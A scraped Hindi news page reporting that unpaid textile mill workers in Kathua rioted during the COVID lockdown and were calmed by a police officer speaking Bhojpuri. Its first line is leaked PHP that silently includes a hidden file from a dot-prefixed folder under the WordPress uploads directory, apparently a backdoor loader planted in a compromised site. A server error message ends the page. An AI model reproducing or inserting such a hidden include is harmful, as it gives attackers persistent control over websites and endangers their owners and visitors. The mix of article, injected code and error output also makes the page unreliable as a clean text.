add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); सैलरी ना मिलने पर मजदूरों ने की तोड़फोड़, SSP ने भोजपुरी में बात कर समझाया – SOCH INDIA
Menu

देश
सैलरी ना मिलने पर मजदूरों ने की तोड़फोड़, SSP ने भोजपुरी में बात कर समझाया

nobanner

कोरोना वायरस महामारी के कारण देश में लॉकडाउन है और हजारों की संख्या में मजदूर फंसे हुए हैं. रोजगार के चक्कर में कई मजदूर फैक्ट्रियों में ही रुके हैं. जम्मू रीजन के कठुआ क्षेत्र में शुक्रवार को कपड़ा मिल में काम करने वाले मजदूरों ने जमकर हंगामा किया. मजदूरों ने आरोप लगाया कि उन्हें पूरा वेतन नहीं मिला है.

यहां शुक्रवार को सैकड़ों मजदूर कठुआ की सड़कों पर उतरे और कपड़ा मिल के आसपास के इलाके में तोड़फोड़ शुरू कर दी. इस दौरान वहां मौजूद कई गाड़ियों को नुकसान पहुंचाया गया.

यहां लोगों को समझाने पहुंचे IPS शैलेंद्र मिश्रा ने भोजपुरी भाषा में लोगों से बात की और उन्हें भरोसा दिलवाया कि वो मिल मालिक से बात कर उनकी बाकी सैलरी दिलवाएंगे.

जब हालात बेकाबू होने लगे तो कठुआ जिले के एसएसपी मौके पर पहुंचे और लोगों को समझाया गया. काफी मशक्कत करने के बाद मजदूरों ने पुलिस की बात मानी. पुलिस की ओर से भरोसा दिलवाया गया कि प्रशासन चेनाब कपड़ा मिल से उनके वेतन को लेकर बात करेगा. फिलहाल वो लोग अपने शिविर में जाएं.

गौरतलब है कि एक जगह भीड़ एकत्रित होने की वजह से कोरोना वायरस महामारी का संकट भी बढ़ जाता है, ऐसे में प्रशासन के सामने सबसे बड़ी चुनौती यही थी कि कैसे इन मजदूरों को समझाकर वापस भेजा जाए. पुलिस के समझाने पर मजदूरों का गुस्सा कुछ हदतक शांत तो हुआ लेकिन सभी अपनी मांग को लेकर अभी भी अड़े हैं.

बता दें कि इस तरह की तस्वीरें देश के अलग-अलग हिस्सों से बीते दिनों में देखने को मिली हैं. हाल ही में सूरत में भी एक कंपनी की साइट पर बीते दिनों मजदूरों ने हंगामा किया था, तब लॉकडाउन में जबरन काम करवाने का आरोप लगाया था.

कोरोना संकट की वजह से लाखों की संख्या में मजदूर जहां थे वहां ही फंस गए. लॉकडाउन के कारण काम भी काफी कम हो रहा है, ऐसे में वेतन का संकट आ रहा है. हजारों की संख्या में मजदूर मजबूरी में पैदल ही अपने घर को रवाना हो रहे हैं.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.